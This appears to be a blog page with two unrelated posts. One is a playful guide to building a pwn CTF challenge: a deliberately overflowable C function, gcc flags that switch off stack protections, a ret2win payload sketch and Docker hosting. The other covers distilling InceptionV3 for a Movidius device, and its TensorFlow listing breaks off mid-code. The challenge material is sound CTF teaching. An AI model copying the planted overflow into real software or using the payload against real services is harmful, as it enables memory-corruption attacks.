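My First Homemade PWN
October 27 is the SECCON CTF online qualifier!
Why not send a handmade PWN challenge to your coworkers and friends to show your everyday gratitude?
Ingredients
- ★Docker: 1
- xinetd: 1
- ★git: to taste
- ★gcc: 1
- ★Python2: 1
- ★pwntools: 1
- ★vim: 3
- ★your favorite text editor: a pinch
- your favorite Linux distribution (Arch Linux is used here): 1
Preparation
Apply the updates to Linux, let them blend in with the package manager, then add the ★ ingredients and mix:
Check which distribution you are on and install everything properly with the matching package manager each time.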
# Arch
sudo pacman -Syu && sudo pacman -S docker git gcc-multilib python2 vim python2-pip && sudo pip2 install pwntools
# Ubuntu
sudo apt update && sudo apt upgrade && sudo apt install docker-ce git gcc python2 vim python2-pip && sudo pip2 install pwntools
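If you would rather not eyeball the distribution, the "check the distribution, then pick the package manager" step can be sketched in Python. This is only a sketch under assumptions: the helper name `pick_package_manager` is made up for illustration, and it only looks at the `ID` and `ID_LIKE` fields of os-release style text.

```python
def pick_package_manager(os_release_text):
    """Return 'pacman' or 'apt' from the ID / ID_LIKE fields of os-release text.

    Hypothetical helper for illustration; only the two distributions
    mentioned in this post are handled.
    """
    fields = {}
    for line in os_release_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key] = value.strip().strip('"').strip("'")

    # ID is the distribution itself, ID_LIKE lists its relatives.
    ids = [fields.get("ID", "")] + fields.get("ID_LIKE", "").split()
    if "arch" in ids:
        return "pacman"
    if "ubuntu" in ids or "debian" in ids:
        return "apt"
    raise ValueError("unsupported distribution: %r" % fields.get("ID"))
```

To use it on a real machine, pass in the contents of `/etc/os-release`, for example `pick_package_manager(open("/etc/os-release").read())`.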
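Making the challenge
1. Prepare the dough
Decide what kind of dough to use: buffer overflow, format string attack, and so on.
2. Think about the method
Decide how it is meant to be solved (shellcode, ROP, and so on) and choose the security mitigations to match.
3. Make it
Make it.
[One-point advice for a tastier result!]
1. Call fflush(stdout); before asking the user for input! Everything that puts() and printf() have buffered gets written out, and the people solving it will like you more for it!
2. Put the vulnerable code in a function other than main()! With 32-bit gcc builds, main() typically restores the stack pointer from a value saved on the stack before its ret, so an overflow there breaks esp before the instruction pointer is ever reached, and eip will not look your way at main()'s ret!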
#include <stdio.h>

void print_flag(void) {
    // omitted
}

int in_name(void) {
    char name[16];
    printf("Type Your Name : ");
    fflush(stdout);
    scanf("%32s", name);  /* intentionally reads more than name[] can hold */
    return 0;
}

int main(void) {
    in_name();
    return 0;
}
4. Compile
Compile it.
[Caution!!] You normally use the compiler without a second thought, but when making PWN, choose its options carefully and with feeling!
mkdir bin
gcc pwn.c -o bin/pwn -m32 -O0 -fno-stack-protector -no-pie -fno-pie
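For reference, here is what each option in that command line is doing, written as a small Python table that also rebuilds the command. The flag descriptions are my own summary; the names `GCC_FLAGS` and `build_command` are hypothetical and exist only for this sketch.

```python
# Each flag from the compile step, paired with a one-line reason.
GCC_FLAGS = [
    ("-m32", "build a 32-bit x86 binary"),
    ("-O0", "disable optimization so the code stays close to the source"),
    ("-fno-stack-protector", "do not emit stack canaries"),
    ("-no-pie", "link a non-position-independent executable"),
    ("-fno-pie", "compile without position-independent code for it"),
]


def build_command(source="pwn.c", output="bin/pwn"):
    """Return the gcc argument list used in this post."""
    return ["gcc", source, "-o", output] + [flag for flag, _ in GCC_FLAGS]
```

`" ".join(build_command())` gives back the exact line above. Which mitigations to switch off depends on the intended solution: a shellcode challenge, for example, would also need an executable stack, which these flags alone do not provide.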
5. Done
The challenge is finished!
Taste-test it with pwntools to see whether it can really be attacked!
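The taste test boils down to sending filler up to the saved return address, followed by the address of print_flag(). Below is a minimal sketch of building such a payload with only the standard library. The values of `OFFSET` and `PRINT_FLAG_ADDR` are placeholders I made up: measure the real offset with a debugger or a cyclic pattern, and read the real address from your own binary.

```python
import struct

# Placeholder values: both depend on your compiler and binary.
OFFSET = 28                   # hypothetical distance from name[] to the return address
PRINT_FLAG_ADDR = 0x08049196  # hypothetical address of print_flag()

# Bytes that make scanf("%s") stop reading.
WHITESPACE = set(b" \t\n\v\f\r")


def build_payload(offset, target_addr, max_len=32):
    """Filler up to the return address, then the 32-bit little-endian target."""
    payload = b"A" * offset + struct.pack("<I", target_addr)
    if any(byte in WHITESPACE for byte in payload):
        raise ValueError("payload contains whitespace; scanf would cut it short")
    if len(payload) > max_len:
        raise ValueError("payload is longer than the %32s limit in in_name()")
    return payload
```

With the placeholder values, `build_payload(OFFSET, PRINT_FLAG_ADDR)` is exactly 32 bytes, which just fits the `%32s` format in in_name(). With pwntools you would send the same bytes through its process or remote tubes.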
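Building the runtime environment
The challenge itself is finished, so now let's gift-wrap it so that it actually runs as a service!
This is starting to feel like a chore, but hang in there!
[Why build an environment at all?]
If a pwn challenge that hands out root ended up giving away your real root, that would be a disaster, right?
So we use Docker to build an environment where it's fine to have root taken (full stop).
If you only want to try it yourself,
socat TCP-LISTEN:8080,reuseaddr,fork EXEC:./pwn
is all you need.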
1. Start the service
On Arch, do this.
sudo systemctl start docker.service
2. Prepare the configuration files
Download the configuration files:
git clone https://github.com/Eadom/ctf_xinetd
In ctf.xinetd, find the line server_args = --userspec=1000:1000 /home/ctf ./helloworld and replace helloworld with the name of your own executable.
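If you would rather not edit the file by hand, the same substitution can be sketched in Python. `set_binary_name` is a made-up helper; it only touches lines that start with `server_args`, and it assumes the file still contains the stock `./helloworld` entry quoted above.

```python
def set_binary_name(xinetd_text, binary_name):
    """Replace ./helloworld with ./<binary_name> on the server_args line only."""
    out = []
    for line in xinetd_text.splitlines(keepends=True):
        if line.strip().startswith("server_args"):
            line = line.replace("./helloworld", "./" + binary_name)
        out.append(line)
    return "".join(out)
```

For example, read `ctf.xinetd`, pass its text through `set_binary_name(text, "pwn")`, and write the result back. Everything except the `server_args` line is left untouched.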
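3. Build
Build it from inside the cloned directory (docker build needs the build context path, here the trailing dot).
sudo docker build -t "pwn" .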
4. Run
sudo docker run --rm -d -p "9999:9999" -h "pwn" --name="pwn" pwn
5. Check the connection
Yay, it works!
Check the connection.
nc localhost 9999
Now run the pwntools script you wrote earlier, this time over the network.
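For readers without pwntools at hand, the network round trip can be sketched with the standard socket module alone. This is a stand-in, not the pwntools API: `send_line` is a made-up helper that reads the prompt, sends one line, and collects whatever the service prints until it closes the connection.

```python
import socket


def send_line(host, port, payload, timeout=5.0):
    """Connect, read the prompt, send payload plus newline, return (prompt, reply)."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        prompt = conn.recv(4096)          # e.g. b"Type Your Name : "
        conn.sendall(payload + b"\n")     # the newline ends the scanf("%s") token
        chunks = []
        while True:
            try:
                data = conn.recv(4096)
            except socket.timeout:
                break                     # service went quiet; stop waiting
            if not data:
                break                     # service closed the connection
            chunks.append(data)
        return prompt, b"".join(chunks)
```

Against the container started above, this would be called as `send_line("localhost", 9999, payload)`, where `payload` is whatever bytes your exploit script builds.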
Oh, YEAH !
Distilling InceptionV3 and running it on Movidius
This is too rough to be publishable.
I plan to put it on GitHub once it is cleaned up.
Distilling into a throwaway CNN
The throwaway CNN
Input: 299 x 299 x 3
Output: caltech101
conv2d(299,299,3)
conv2d(,,32)
conv2d(, , 64)
conv2d(, , 128)
dense(625)
dropout
dense(101)
Results
Teacher
----------------------------------------------
EPOCH 3/3
100%|██████████| 72/72 [00:29<00:00, 2.40it/s]
100%|██████████| 54/54 [00:06<00:00, 7.94it/s]
loss: 0.8792 val accuracy: 0.8924
Student
----------------------------------------------
EPOCH 30/30
100%|██████████| 72/72 [00:17<00:00, 4.09it/s]
100%|██████████| 54/54 [00:03<00:00, 16.21it/s]
loss: 7.9115 val accuracy: 0.4034
Student without distillation
----------------------------------------------
EPOCH 30/30
100%|██████████| 72/72 [00:10<00:00, 6.81it/s]
100%|██████████| 54/54 [00:03<00:00, 15.68it/s]
loss: 16.6656 val accuracy: 0.4259
The distilled student lost (0.4034 vs. 0.4259 validation accuracy).
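For context, the student loss in the source listing further down is a weighted sum: 0.2 times the ordinary cross-entropy against the labels, plus the cross-entropy between the temperature-softened teacher and student outputs (temperature 4). Here is a dependency-free sketch of that formula on plain Python lists. It is an illustration, not the TensorFlow code itself, and the function names are my own.

```python
import math


def softmax(logits, temperature=1.0):
    """Numerically stable softmax of logits / temperature."""
    scaled = [x / temperature for x in logits]
    peak = max(scaled)
    exps = [math.exp(x - peak) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]


def cross_entropy(target, predicted, eps=1e-10):
    """-sum(target * log(predicted)), clipping predicted to [eps, 1] as the listing does."""
    return -sum(t * math.log(min(max(p, eps), 1.0))
                for t, p in zip(target, predicted))


def distillation_loss(teacher_logits, student_logits, onehot,
                      temperature=4.0, hard_weight=0.2):
    """hard_weight * CE(labels, student) + CE(soft teacher, soft student)."""
    soft = cross_entropy(softmax(teacher_logits, temperature),
                         softmax(student_logits, temperature))
    hard = cross_entropy(onehot, softmax(student_logits))
    return hard_weight * hard + soft
```

Because the soft term is a cross-entropy rather than a KL divergence, it does not reach zero even when the student matches the teacher exactly. Keep that in mind when comparing the loss values printed above.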
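Running it on Movidius
With
mvNCProfile
I could measure the inference time alone.
For a 299 x 299 x 3 image it reports 130.27 ms per image.
Measured on the device:
Time : 58.298219442367554 (435 images)
That works out to 134 ms per image.
In other words, loading an image onto the device takes only about 4 ms.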
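The arithmetic behind those two figures, as a small Python check that uses only the numbers quoted above:

```python
# Numbers quoted in the post.
total_seconds = 58.298219442367554   # wall-clock time for the whole run
images = 435                         # images processed in that run
profiled_ms = 130.27                 # per-image inference time from mvNCProfile

# Wall-clock time per image, in milliseconds.
measured_ms = total_seconds / images * 1000.0

# Whatever is not inference: mostly getting the image onto the device.
overhead_ms = measured_ms - profiled_ms

print("measured: {:.2f} ms/image".format(measured_ms))
print("overhead: {:.2f} ms/image".format(overhead_ms))
```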
Incidentally, the model has 83M parameters.
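The 83M figure can be reproduced by hand from the student network in the source listing: four 3x3 conv layers (32, 64, 128, 256 channels), each followed by 2x2 max pooling, then fully connected layers of 1000 and 101 units. The sketch below assumes the slim defaults: size-preserving convolutions and unpadded pooling. The function name is made up.

```python
def count_student_params(size=299, in_channels=3,
                         conv_channels=(32, 64, 128, 256),
                         fc_units=1000, n_classes=101):
    """Count weights and biases of the conv/pool/fc student network."""
    total = 0
    channels = in_channels
    for out_channels in conv_channels:
        # 3x3 kernel weights plus one bias per output channel
        total += 3 * 3 * channels * out_channels + out_channels
        channels = out_channels
        # 2x2 max pool with stride 2 and no padding
        size = (size - 2) // 2 + 1
    flat = size * size * channels              # flattened feature vector
    total += flat * fc_units + fc_units        # fc1
    total += fc_units * n_classes + n_classes  # fc2
    return total


print(count_student_params())
```

Nearly all of the parameters sit in the first fully connected layer (18 x 18 x 256 inputs times 1000 units). That layer is the obvious thing to shrink if the model needs to be smaller.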
Summary
I fine-tuned InceptionV3, distilled it into a different network, and got the result running on Movidius.
Teaching MobilenetV1 (224x224, α=1) from InceptionV3
Install nets from tensorflow/models:
python setup.py install
After that it can be imported:
import nets.mobilenet_v1
Then, when you call
stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1()
the stu2_end_points you get back
holds the details of MobileNet.
Looking inside it tells you a lot.
['Conv2d_0', 'Conv2d_1_depthwise', 'Conv2d_1_pointwise', 'Conv2d_2_depthwise', 'Conv2d_2_pointwise', 'Conv2d_3_depthwise', 'Conv2d_3_pointwise', 'Conv2d_4_depthwise', 'Conv2d_4_pointwise', 'Conv2d_5_depthwise', 'Conv2d_5_pointwise', 'Conv2d_6_depthwise', 'Conv2d_6_pointwise', 'Conv2d_7_depthwise', 'Conv2d_7_pointwise', 'Conv2d_8_depthwise', 'Conv2d_8_pointwise', 'Conv2d_9_depthwise', 'Conv2d_9_pointwise', 'Conv2d_10_depthwise', 'Conv2d_10_pointwise', 'Conv2d_11_depthwise', 'Conv2d_11_pointwise', 'Conv2d_12_depthwise', 'Conv2d_12_pointwise', 'Conv2d_13_depthwise', 'Conv2d_13_pointwise', 'AvgPool_1a', 'Logits', 'Predictions']
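The list follows a regular pattern: one ordinary convolution, thirteen depthwise/pointwise pairs, then the pooling and output stages. This small sketch rebuilds the same names, which is handy if you want to loop over them. The function name is hypothetical.

```python
def mobilenet_v1_endpoint_names(n_separable=13):
    """Rebuild the end point names printed above, in order."""
    names = ["Conv2d_0"]
    for i in range(1, n_separable + 1):
        names.append("Conv2d_%d_depthwise" % i)
        names.append("Conv2d_%d_pointwise" % i)
    names += ["AvgPool_1a", "Logits", "Predictions"]
    return names
```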
When building the model you can specify the number of output units, but then the model no longer matches the pretrained checkpoint, so the weights of the parts that changed must not be loaded.
For example, in the list above, Logits
and Predictions
look suspicious.
print("shape of logits: ", ep2['Logits'].shape)
print("shape of prediction: ", ep2['Predictions'].shape)
Check the shapes of the suspicious ones, and if they have the number of outputs you specified, do not restore the checkpoint into them.
mbnet_pretrained_include = ["MobilenetV1"]
mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"]
mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore(
    include=mbnet_pretrained_include,
    exclude=mbnet_pretrained_exclude)
mbnet_pretrained_saver = tf.train.Saver(
    mbnet_pretrained_vars, name="mobilenet_pretrained_saver")
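The include/exclude idea is easy to picture on plain strings. The sketch below is a simplified stand-in for what the TensorFlow helper does, not its implementation: it keeps every name under an included scope unless it also falls under an excluded one. The variable names in the usage note are illustrative.

```python
def select_variables(names, include, exclude):
    """Keep names inside any include scope and outside every exclude scope."""
    def in_scope(name, scope):
        # A name belongs to a scope if it is the scope or lives below it.
        return name == scope or name.startswith(scope + "/")

    return [name for name in names
            if any(in_scope(name, scope) for scope in include)
            and not any(in_scope(name, scope) for scope in exclude)]
```

Calling it with `include=["MobilenetV1"]` and `exclude=["MobilenetV1/Predictions", "MobilenetV1/Logits"]` keeps something like `MobilenetV1/Conv2d_0/weights` but drops everything under `MobilenetV1/Logits`. Those dropped layers are exactly the ones whose shape changed with the number of classes.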
Trying it out
Teacher
----------------------------------------------
EPOCH 30/30
100%|██████████| 72/72 [00:16<00:00, 4.35it/s]
100%|██████████| 54/54 [00:03<00:00, 13.75it/s]
loss: 0.0003 val accuracy: 0.8582
Student
----------------------------------------------
EPOCH 72/300
100%|██████████| 72/72 [00:17<00:00, 4.01it/s]
100%|██████████| 54/54 [00:02<00:00, 23.67it/s]
loss: 6.1732 val accuracy: 0.4126
Converting it for Movidius
Running
mvNCCompile
gives
FailedPreconditionError (see above for traceback): Attempting to use uninitialized value MobilenetV1/Conv2d_0/BatchNorm/moving_mean
The Saver used in the conversion script was only handling the trainable variables,
so I switched it to tf.global_variables(),
and then got
NotFoundError: Key MobilenetV1/Conv2d_0/BatchNorm/moving_mean not found in checkpoint
which means the variable was already missing when the checkpoint was first saved.
So I also switched the original training script to tf.global_variables()
and saved again.
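The root cause is that batch-norm moving averages are variables but not trainable ones, so a Saver built from the trainable list silently leaves them out. Here is a toy model of that, using plain tuples instead of TensorFlow objects. The variable list is illustrative, not dumped from the real graph.

```python
# (name, trainable) pairs standing in for graph variables; illustrative only.
VARIABLES = [
    ("MobilenetV1/Conv2d_0/weights", True),
    ("MobilenetV1/Conv2d_0/BatchNorm/beta", True),
    ("MobilenetV1/Conv2d_0/BatchNorm/moving_mean", False),
    ("MobilenetV1/Conv2d_0/BatchNorm/moving_variance", False),
]


def saved_names(variables, trainable_only):
    """Names a saver would write if built from trainable or from all variables."""
    return [name for name, trainable in variables
            if trainable or not trainable_only]


def missing_from_checkpoint(variables):
    """Names present in the graph but absent from a trainable-only checkpoint."""
    saved = set(saved_names(variables, trainable_only=True))
    return [name for name, _ in variables if name not in saved]


print(missing_from_checkpoint(VARIABLES))
```

The two names it prints are the kind that show up in the errors above. They have to be saved by the training script and restored by the conversion script, so both Savers need the full variable list.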
[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found preprocess/rescaled_inputs
[Error 5] Toolkit Error: Stage Details Not Supported: Top Not Found mbnet_struct/truediv
Now it fails with a different error.
Perhaps div is not supported?
For the former, I decided to divide by 255 beforehand and feed in the result.
The latter was not being used.
I removed both and reran:
tokunn@nanase 9:00:09 [~/Documents/distil_incep2mbnet0921] $ python3 movidius.py /home/tokunn/caltech101/butterfly 2>/dev/null
Image path : /home/tokunn/caltech101/butterfly/*.jpg or *.png
['image_0032.jpg', 'image_0073.jpg', 'image_0017.jpg', 'image_0089.jpg', 'image_0085.jpg', 'image_0078.jpg', 'image_0056.jpg', 'image_0069.jpg', 'image_0074.jpg', 'image_0025.jpg']
imgshape (91, 224, 224)
Start predicting ...
butterfly Faces butterfly chandelier butterfly Faces chandelier butterfly butterfly butterfly butterfly revolver butterfly butterfly revolver butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly sunflower revolver butterfly chandelier butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier butterfly butterfly butterfly Faces butterfly Faces butterfly butterfly butterfly Faces butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly chandelier cellphone butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly butterfly
Time : 3.817107915878296 (91 images)
Wonderful!
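To put that timing next to the earlier throwaway-CNN run, here is the per-image arithmetic using only numbers printed in this post. The two runs use different input sizes and image sets, so treat the ratio as a rough indication, not a benchmark.

```python
# Throwaway CNN run: 435 images in 58.298... seconds.
cnn_ms = 58.298219442367554 / 435 * 1000.0

# MobilenetV1 run: 91 images in 3.817... seconds.
mbnet_ms = 3.817107915878296 / 91 * 1000.0

# How many times faster the MobilenetV1 run was per image.
speedup = cnn_ms / mbnet_ms

print("CNN:       {:.1f} ms/image".format(cnn_ms))
print("Mobilenet: {:.1f} ms/image".format(mbnet_ms))
print("ratio:     {:.1f}x".format(speedup))
```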
Source code
Throwaway CNN edition
Teacher and student
#!/usr/bin/env python
# coding: utf-8

# In[1]:

import os,time,glob
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"

import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
#from __future__ import print_function, division
import loadimg_caltech as loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()

# In[2]:

np_aryname = './models/data{0}.npy'
try:
    # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = np.asscalar(np.load(np_aryname.format('number_of_classes')))
except FileNotFoundError:
    print("### Load from Images ###")
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')
    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)

print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)

# In[3]:

SNAPSHOT_FILE = "./models/snapshot.ckpt"
STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
#[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = number_of_classes     # Change N_CLASSES to suit your needs

temperature = 4

# In[4]:

def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False):
    with tf.variable_scope(scope, reuse = reuse) as sc:
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 256,scope='conv4')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            net = slim.fully_connected(net,1000,scope='fc1') # 625
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            #net = tf.nn.softmax(net/temperature)
            return net

# In[5]:

def loss(prediction,output):#,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
        reduction_indices=[1]))
    #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy#,accuracy

# In[6]:

graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training")
        stu_keep_prob_conv = tf.placeholder(tf.float32)
        stu_keep_prob_hidden = tf.placeholder(tf.float32)

    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)
    with tf.name_scope("softmax") as scope:
        tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax")
        tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual")

    # Student
    stu_logits = NetworkStudent(tf_X, stu_keep_prob_conv,
                                stu_keep_prob_hidden, scope='student')
    with tf.name_scope("stu_struct"):
        # softmax
        stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
        stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")

    # Separate vars
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'InceptionV3' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        #unrolled_labels = tf.reshape(tf_Y, (-1,))
        #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels,
        tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits)
        tf_loss = tf.losses.get_total_loss()
        #tf_loss = loss(tch_y_actual, tf_Y)

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        #with tf.control_dependencies(update_ops):
        #    tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
        grad_teacher = tf.gradients(tf_loss, var_teacher)
        tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher))

    # Evaluation
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )

    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    # Student
    with tf.name_scope("stu_train"):
        # loss
        tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits)
        stu_loss1 = tf.losses.get_total_loss()
        #stu_loss1 = loss(stu_y_actual, tf_Y)
        stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
            tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1))
        stu_loss = 0.2 * stu_loss1 + stu_loss2
        #stu_loss = stu_loss1

        # optimization
        grad_student = tf.gradients(stu_loss,var_student)
        stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
        #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #stu_trainer = tf.train.AdadeltaOptimizer()
        train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student))
        #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer")
        #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op")

        # evaluation
        stu_accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )

    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(var_teacher, name="saver")
    # STUDENT SAVER
    stu_saver = tf.train.Saver(var_student, name="stu_saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)

# In[7]:

def initialize_vars(session):
    # INITIALIZE VARS
    LOAD_FROM_CHECKPOINT = False
    if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        session.run(tf.global_variables_initializer())
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)

# In[ ]:

with tf.Session(graph=graph) as sess:
    n_epochs = 5
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)

    print("##### Teacher Training Section #####")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')

        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            tf_train_step.run(feed_dict=feed_dict)

        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]

            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))

        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([tch_y, tf_loss],
                                        feed_dict = {
                                            tf_X: [X_test[5]],
                                            tf_Y: [Y_test[5]],
                                            tf_is_training: False
                                        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()

        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)

    print("### Student Training Section ###")
    n_epochs = 300
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')

        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         #tf_alpha:0.001,
